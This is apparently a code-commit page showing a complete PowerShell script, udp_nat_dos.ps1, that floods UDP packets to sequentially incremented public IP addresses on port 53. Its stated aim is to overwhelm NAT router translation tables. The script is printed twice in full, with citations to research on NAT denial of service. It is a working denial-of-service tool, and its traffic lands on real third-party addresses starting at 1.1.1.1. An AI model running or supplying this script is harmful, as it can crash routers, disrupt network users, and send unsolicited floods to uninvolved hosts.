obsti8383 · April 2, 2023 12:44
diff --git a/udp_nat_dos.ps1 b/udp_nat_dos.ps1
 # Sends many UDP packets to different target IPs. Tries to overhelm the NAT translation tables of
 # NAT routers
 #
 # Example calls:
 #  Linux with installed Powershell: pwsh udp_nat_dos.ps1 
 #  Windows .\udp_nat_dos.ps1
 #
 # Code adapted from https://www.msxfaq.de/code/powershell/psudp.htm
 # Original source seems to be: http://pshscripts.blogspot.de/2008/12/send-udpdatagramps1.html
 #
 # Literature:
 # - [NAT Denial of Service: An Analysis of Translation Table Behavior on Multiple Platforms, Nathan Winemiller et.al., 2012](https://scholarworks.rit.edu/cgi/viewcontent.cgi?referer=&httpsredir=1&article=1756&context=other)
 # - [Discussion on Stack Exchange regarding Asus router](https://security.stackexchange.com/questions/103505/router-reboots-when-using-nmap)
 # - [Discussion on serverfault regarding FritzBox](https://serverfault.com/questions/989518/router-reboots-when-doing-port-scanning)
 # - [Wie viele NAT-Sessions verträgt mein Router?](https://www.nwlab.net/know-how/Router-Test-Tool/) - "Aktuelle DSL-Router erlauben oft einige Tausend Verbindungen. Die AVM Fritzbox 7390 schaffte in unseren Tests etwa 7.000 Sessions."

 param (	
 	# port to send to
 	[ValidateRange(1, 65535)]
 	[int]$remoteudpport = 53,	

 	# SourcePort, 0 uses an available port
 	[ValidateRange(0, 65535)]
 	[int]$sourceudpport = 0, 

 	[string]$buffer = "x",

 	# packetcount
 	[int]$packetcount = 200000					
 )

 $ErrorActionPreference = "Stop"

 [DateTime]$start = [Datetime]::Now
 [int]$count = 0
 try {
 	# start ip
 	[IPAddress]$remoteip = [IPAddress] "1.1.1.1"

 	$udpClient = new-Object system.Net.Sockets.Udpclient($sourceudpport)
 	$byteBuffer = [System.Text.Encoding]::ASCII.GetBytes($buffer)
 	$byteBufLen = $byteBuffer.length

 	Write-Host "Lets go..."
 	for ($i = 0; $i -lt $packetcount; $i++) {
 		# sent packet
 		$sentbytes = $udpClient.Send($byteBuffer, $byteBufLen, $remoteip, $remoteudpport)
 		if ($sentbytes -ne $byteBufLen) {
 			write-host "Error: Send Bytes Mismatch"
 		}

 		# increase packet counter
 		$count++
 		# change ip address by adding 1
 		$remoteip = New-Object System.Net.IPAddress($remoteip.Address + 1)
 	}
 }
 catch {
 	write-host "Error:" $error
 }
 finally {
 	$udpclient.close()
 	[DateTime]$end = [Datetime]::Now
 	$duration = $end - $start
 	write-host "count:" $count
 	write-host "Duration:" $duration "`nPackets per second:" ( $count / $duration * 10000000 )
 }
	# Sends many UDP packets to different target IPs. Tries to overhelm the NAT translation tables of
	# NAT routers
	#
	# Example calls:
	# Linux with installed Powershell: pwsh udp_nat_dos.ps1
	# Windows .\udp_nat_dos.ps1
	#
	# Code adapted from https://www.msxfaq.de/code/powershell/psudp.htm
	# Original source seems to be: http://pshscripts.blogspot.de/2008/12/send-udpdatagramps1.html
	#
	# Literature:
	# - [NAT Denial of Service: An Analysis of Translation Table Behavior on Multiple Platforms, Nathan Winemiller et.al., 2012](https://scholarworks.rit.edu/cgi/viewcontent.cgi?referer=&httpsredir=1&article=1756&context=other)
	# - [Discussion on Stack Exchange regarding Asus router](https://security.stackexchange.com/questions/103505/router-reboots-when-using-nmap)
	# - [Discussion on serverfault regarding FritzBox](https://serverfault.com/questions/989518/router-reboots-when-doing-port-scanning)
	# - [Wie viele NAT-Sessions verträgt mein Router?](https://www.nwlab.net/know-how/Router-Test-Tool/) - "Aktuelle DSL-Router erlauben oft einige Tausend Verbindungen. Die AVM Fritzbox 7390 schaffte in unseren Tests etwa 7.000 Sessions."

	param (
	# port to send to
	[ValidateRange(1, 65535)]
	[int]$remoteudpport = 53,

	# SourcePort, 0 uses an available port
	[ValidateRange(0, 65535)]
	[int]$sourceudpport = 0,

	[string]$buffer = "x",

	# packetcount
	[int]$packetcount = 200000
	)

	$ErrorActionPreference = "Stop"

	[DateTime]$start = [Datetime]::Now
	[int]$count = 0
	try {
	# start ip
	[IPAddress]$remoteip = [IPAddress] "1.1.1.1"

	$udpClient = new-Object system.Net.Sockets.Udpclient($sourceudpport)
	$byteBuffer = [System.Text.Encoding]::ASCII.GetBytes($buffer)
	$byteBufLen = $byteBuffer.length

	Write-Host "Lets go..."
	for ($i = 0; $i -lt $packetcount; $i++) {
	# sent packet
	$sentbytes = $udpClient.Send($byteBuffer, $byteBufLen, $remoteip, $remoteudpport)
	if ($sentbytes -ne $byteBufLen) {
	write-host "Error: Send Bytes Mismatch"
	}

	# increase packet counter
	$count++
	# change ip address by adding 1
	$remoteip = New-Object System.Net.IPAddress($remoteip.Address + 1)
	}
	}
	catch {
	write-host "Error:" $error
	}
	finally {
	$udpclient.close()
	[DateTime]$end = [Datetime]::Now
	$duration = $end - $start
	write-host "count:" $count
	write-host "Duration:" $duration "`nPackets per second:" ( $count / $duration * 10000000 )
	}